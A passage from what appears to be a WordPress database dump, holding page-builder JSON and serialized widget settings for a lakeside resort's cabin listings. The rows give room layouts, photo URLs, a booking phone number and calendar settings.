d9c7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"79c352d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c4cd61c\"}]},\"elements\":[{\"id\":\"c7622c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"013e706\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2a9bf7b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4aff54c\"}]},\"elements\":[{\"id\":\"31f7a67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>\\u00a0<\\/h2><p><strong>Love to stay at a Cabin - <span style=\\\"text-decoration: underline;\\\"><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a><\\/span><\\/strong><\\/p><p>Cabins are available weekly only\\u00a0 (Saturday to Saturday) during June and July. There are a few weeks still available for 2019.<\\/p><p><strong>Our motel and cabins are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets. <a href=\\\"http:\\/\\/ashbyresort.com\\/campground-map\\/\\\">(see map)<\\/a><\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a763503\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3f28486\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"76a9305\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3ec644e\"}]},\"elements\":[{\"id\":\"c20b05e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d36d555\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"b3d4418\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"bc32c7b\"}]},\"elements\":[{\"id\":\"44df606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 10\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"25a558f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-001.jpg\",\"id\":286}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5430be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-0-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"2\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>2 bedroom , 1 bath<\\/strong><\\/p><p><strong>2\\u00a0queen beds, 1 double bed, 1 futon<\\/strong><\\/p><p><strong>Sleeps 8<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"666a77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3c6e3e6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3cf59d7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"69505cd\"}]},\"elements\":[{\"id\":\"ec73946\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 11\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c5f5023\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/cabin11.jpg\",\"id\":282}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a9b3aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-1-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"6\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>2 bedroom, 1 bath<\\/strong><\\/p><p><strong>\\u00a02 queen\\u00a0beds, 1\\u00a0double bed, 1 futon<\\/strong><\\/p><p><strong>Sleeps 8<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dcd2c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e1b9636\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"68cf5dc\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6008bdd\"}]},\"elements\":[{\"id\":\"6a1d473\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 12\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c8e6a42\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/Carly-008.jpg\",\"id\":119}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fe9f77\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-2-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"10\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>Remodeled in 2016\\u00a0\\u00a0\\u00a0\\u00a0\\u00a0\\u00a0 2 bedroom 1 bath<\\/strong><\\/p><p><strong>\\u00a01 queen\\u00a0bed, 2 twin beds, 1 hide-a-bed,<\\/strong><\\/p><p><strong>Sleeps 6<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f280b90\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"394f183\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"418f6db\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ee7fbf2\"}]},\"elements\":[{\"id\":\"6bffb12\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a389722\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dc479f1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9bad41c\"}]},\"elements\":[{\"id\":\"66464a3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.01-PM.png\",\"id\":781}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"aaa14b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3188235\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3ae6faf\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c43867\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8610c84\"}]},\"elements\":[{\"id\":\"7fbb51d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.10-PM.png\",\"id\":782}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d87bedc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"41f8343\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"478e9cb\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8309568\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a685e8c\"}]},\"elements\":[{\"id\":\"6a8b220\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.17-PM.png\",\"id\":783}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7203260\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"wp-caption-text\\\"><br \\/><strong>Done in knotty pine has air conditioning, full kitchen and bathtub<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8075410\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2c48cf1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dcac1af\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d389044\"}]},\"elements\":[{\"id\":\"e118b35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"97d9b2a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8c7465d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"11e2398\"}]},\"elements\":[{\"id\":\"5e6d46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Cabin1011interior02.jpg\",\"id\":280}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"47acfec\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c86872a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a8e8c8e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"17be54e\"}]},\"elements\":[{\"id\":\"0cd24ef\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Cabin12interior.jpg\",\"id\":284}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4384dfc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9fd9d04\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2873594\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"88e6c47\"}]},\"elements\":[{\"id\":\"a7d623e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3948.jpg\",\"id\":388}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2505,831,'_elementor_edit_mode','builder'),(2506,831,'_elementor_template_type','post'),(2507,831,'_elementor_version','2.5.15'),(2508,831,'_wp_page_template','default'),(2509,831,'_elementor_data','[{\"id\":\"f523c97\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5afd9c7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"79c352d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c4cd61c\"}]},\"elements\":[{\"id\":\"c7622c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"013e706\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2a9bf7b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4aff54c\"}]},\"elements\":[{\"id\":\"31f7a67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><strong>I had a couple of late cancellations. I am going to offer some three night stays in the month of June. Call for details !!!<\\/strong><\\/h2><p><strong>Love to stay at a Cabin - <span style=\\\"text-decoration: underline;\\\"><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a><\\/span><\\/strong><\\/p><p>Cabins are available weekly only\\u00a0 (Saturday to Saturday) during June and July. There are a few weeks still available for 2019.<\\/p><p><strong>Our motel and cabins are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets. <a href=\\\"http:\\/\\/ashbyresort.com\\/campground-map\\/\\\">(see map)<\\/a><\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a763503\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3f28486\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"76a9305\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3ec644e\"}]},\"elements\":[{\"id\":\"c20b05e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d36d555\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"b3d4418\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"bc32c7b\"}]},\"elements\":[{\"id\":\"44df606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 10\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"25a558f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-001.jpg\",\"id\":286}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5430be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-0-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"2\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>2 bedroom , 1 bath<\\/strong><\\/p><p><strong>2\\u00a0queen beds, 1 double bed, 1 futon<\\/strong><\\/p><p><strong>Sleeps 8<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"666a77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3c6e3e6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3cf59d7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"69505cd\"}]},\"elements\":[{\"id\":\"ec73946\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 11\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c5f5023\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/cabin11.jpg\",\"id\":282}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a9b3aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-1-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"6\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>2 bedroom, 1 bath<\\/strong><\\/p><p><strong>\\u00a02 queen\\u00a0beds, 1\\u00a0double bed, 1 futon<\\/strong><\\/p><p><strong>Sleeps 8<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dcd2c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e1b9636\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"68cf5dc\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6008bdd\"}]},\"elements\":[{\"id\":\"6a1d473\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 12\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c8e6a42\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/Carly-008.jpg\",\"id\":119}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fe9f77\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-2-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"10\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>Remodeled in 2016\\u00a0\\u00a0\\u00a0\\u00a0\\u00a0\\u00a0 2 bedroom 1 bath<\\/strong><\\/p><p><strong>\\u00a01 queen\\u00a0bed, 2 twin beds, 1 hide-a-bed,<\\/strong><\\/p><p><strong>Sleeps 6<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f280b90\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"394f183\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"418f6db\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ee7fbf2\"}]},\"elements\":[{\"id\":\"6bffb12\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a389722\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dc479f1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9bad41c\"}]},\"elements\":[{\"id\":\"66464a3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.01-PM.png\",\"id\":781}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"aaa14b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3188235\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3ae6faf\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c43867\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8610c84\"}]},\"elements\":[{\"id\":\"7fbb51d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.10-PM.png\",\"id\":782}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d87bedc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"41f8343\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"478e9cb\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8309568\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a685e8c\"}]},\"elements\":[{\"id\":\"6a8b220\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.17-PM.png\",\"id\":783}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7203260\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"wp-caption-text\\\"><br \\/><strong>Done in knotty pine has air conditioning, full kitchen and bathtub<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8075410\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2c48cf1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dcac1af\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d389044\"}]},\"elements\":[{\"id\":\"e118b35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"97d9b2a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8c7465d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"11e2398\"}]},\"elements\":[{\"id\":\"5e6d46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Cabin1011interior02.jpg\",\"id\":280}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"47acfec\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c86872a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a8e8c8e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"17be54e\"}]},\"elements\":[{\"id\":\"0cd24ef\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Cabin12interior.jpg\",\"id\":284}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4384dfc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9fd9d04\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2873594\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"88e6c47\"}]},\"elements\":[{\"id\":\"a7d623e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3948.jpg\",\"id\":388}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2529,832,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:7:{s:6:\"visual\";b:0;s:5:\"title\";s:35:\"CALL FOR AVAILABILITY 218-747-2959.\";s:4:\"text\";s:476:\"Book your stay by calling (218) 747-2959. The calendar is not up to date showing availability. You can also send a request for booking by filling out form on right and selecting the days you wish to stay in the calendar on the right.\nWe will call you to confirm Reservation.\nRemember that a deposit is required before a booking can be confirmed. Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.\n\n[wpdevart_booking_calendar id=\"1\"]\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:14:\"WP_Widget_Text\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"a3341bb8-5b40-4200-adc9-7ee4acb51ee2\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:6:\"filter\";b:0;s:22:\"so_sidebar_emulator_id\";s:13:\"text-83210000\";s:11:\"option_name\";s:11:\"widget_text\";}i:1;a:8:{s:20:\"booking_widget_title\";s:0:\"\";s:19:\"booking_widget_show\";s:12:\"booking_form\";s:29:\"booking_widget_calendar_count\";s:1:\"1\";s:25:\"booking_widget_last_field\";s:0:\"\";s:19:\"booking_widget_type\";s:0:\"\";s:22:\"so_sidebar_emulator_id\";s:22:\"bookingwidget-83210001\";s:11:\"option_name\";s:20:\"widget_bookingwidget\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:13:\"BookingWidget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"b899f0e7-1b45-4c75-b586-28eb4cc2f24b\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:2;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:2:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";d:0.77279005524900001855570508269011043012142181396484375;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:1;s:6:\"weight\";d:0.2272099447510000091998705329388030804693698883056640625;s:5:\"style\";a:0:{}}}}'),(2530,832,'_wp_page_template','default'),(2531,832,'_elementor_edit_mode','builder'),(2532,832,'_elementor_template_type','post'),(2533,832,'_elementor_version','2.5.16'),(2535,833,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:7:{s:6:\"visual\";b:0;s:5:\"title\";s:35:\"CALL FOR AVAILABILITY 218-747-2959.\";s:4:\"text\";s:476:\"Book your stay by calling (218) 747-2959. The calendar is not up to date showing availability. You can also send a request for booking by filling out form on right and selecting the days you wish to stay in the calendar on the right.\nWe will call you to confirm Reservation.\nRemember that a deposit is required before a booking can be confirmed. Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.\n\n[wpdevart_booking_calendar id=\"1\"]\";s:6:\"filter\";b:0;s:22:\"so_sidebar_emulator_id\";s:12:\"text-8810000\";s:11:\"option_name\";s:11:\"widget_text\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:14:\"WP_Widget_Text\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"a3341bb8-5b40-4200-adc9-7ee4acb51ee2\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:8:{s:20:\"booking_widget_title\";s:0:\"\";s:19:\"booking_widget_show\";s:12:\"booking_form\";s:29:\"booking_widget_calendar_count\";s:1:\"1\";s:25:\"booking_widget_last_field\";s:0:\"\";s:19:\"booking_widget_type\";s:0:\"\";s:22:\"so_sidebar_emulator_id\";s:21:\"bookingwidget-8810001\";s:11:\"option_name\";s:20:\"widget_bookingwidget\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:13:\"BookingWidget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"b899f0e7-1b45-4c75-b586-28eb4cc2f24b\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:2;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:2:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";d:0.77279005524900001855570508269011043012142181396484375;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:1;s:6:\"weight\";d:0.2272099447510000091998705329388030804693698883056640625;s:5:\"style\";a:0:{}}}}'),(2536,